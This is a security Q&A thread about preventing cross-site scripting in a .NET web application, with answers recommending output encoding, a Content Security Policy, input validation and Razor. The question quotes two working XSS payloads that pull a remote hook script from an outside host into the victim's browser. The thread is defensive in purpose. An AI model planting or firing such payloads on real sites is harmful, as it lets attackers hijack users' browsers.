0

In my web application, while doing the penetration testing two XSS vulnerabilities identified in some text input.

that field testing using followin cheets,

<script src="http://192.168.1.122:3000/hook.js"></script>

<svg/onload=setInterval(function(){with(document)body.
appendChild(createElement("script")).src="//HOST:PORT"},0)>

How to avoid this. have any .net library or any third party library to prevent this.pelase help me.

Sachith
  • 101
  • 3
  • 1
    Sanitize your inputs. Maybe even your outputs if you're feeling especially paranoid. – user Dec 16 '19 at 16:26
  • @user can you please tell me, how can I do it, please give me a sample code or tutorial to do it using .net – Sachith Dec 16 '19 at 16:27
  • It's not hard to google "prevent xss asp", or even searching this site for existing answers, but here is a link anyway https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet – wireghoul Dec 16 '19 at 16:53
  • @Sachith [Here](https://stackoverflow.com/questions/188870/how-to-use-c-sharp-to-sanitize-input-on-an-html-page). – user Dec 16 '19 at 17:37

2 Answers2

1

There are a few things to do:

  • HTML Encode any HTML OUTPUT REF: https://docs.microsoft.com/en-us/dotnet/api/system.web.httputility.htmlencode?view=netframework-4.8
  • Implement a proper CSP. This will prevent third party remote scripts from loading like on the first payload REF: https://content-security-policy.com/ This won't prevent XSS, but will make the script length limited to that of the field, making payload options limited.
  • If you have the time implement INPUT validation only allowing expected data like characters and numbers. If you have proper OUTPUT encoding this isn't even necessary, but still is advised to do. The main issue with INPUT validation is that it can be much more easily bypassed than output encoding and more mistakes usually are made here.
Raimonds Liepiņš
  • 994
  • 5
  • 9
1

Look into Razor MVC syntax (https://en.wikipedia.org/wiki/ASP.NET_Razor) for HTML and JavaScript encoding. In addition to that, I'd suggest setting the x-xss-protection HTTP headers properly, and for good measure it's a decent idea to have a Content Security Policy. You want to be validating your inputs, and escaping your outputs.. Razor MVC is a good option for this in ASP.NET.

I believe ASP.NET by default will prevent typical source-based HTML injections, so what you really want to be looking out for are DOM-Based flaws (for example, URL redirection to a javascript: uri scheme) and injections in the context of in-line javascript injection (e.g. their payload landing between some script tags so they can inject pure JS code without any need for tags and/or event handlers)

Also, props to you for using my buddy Brute's browser hooking payload/syntax ;D rather than using some beef hooks. Brute is great at XSS stuff :) he's a chill friend of mine. I'm assuming you know him since that's his browser hooking payload that you posted.

There was a (kinda recent) request validation bypass method for ASP.NET, although I'd be surprised if it wasn't patched by now because it was pretty high-profile at the time that it got released. Check this out, though - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/ if it isn't patched then you want to be using Razor MVC to ensure that you're properly sanitizing malicious inputs of this nature.

but yeah, the other answer summarized things pretty well, here's what you want to do:

  • validate inputs / escape outputs (I'd suggest using Razor for this)
  • implement a Content Security Policy
  • Ensure you don't mess anything up regarding ViewState MAC auth (as this could lead to XSS in ASP.NET)
  • Add the x-xss-protection headers with the correct mode
  • Implement CORS rules

With those measures in place, you should be good... as long as you take into consideration all forms of DOM-Based attacks (as DOM-Based XSS can get around some of these countermeasures).

MLT
  • 51
  • 4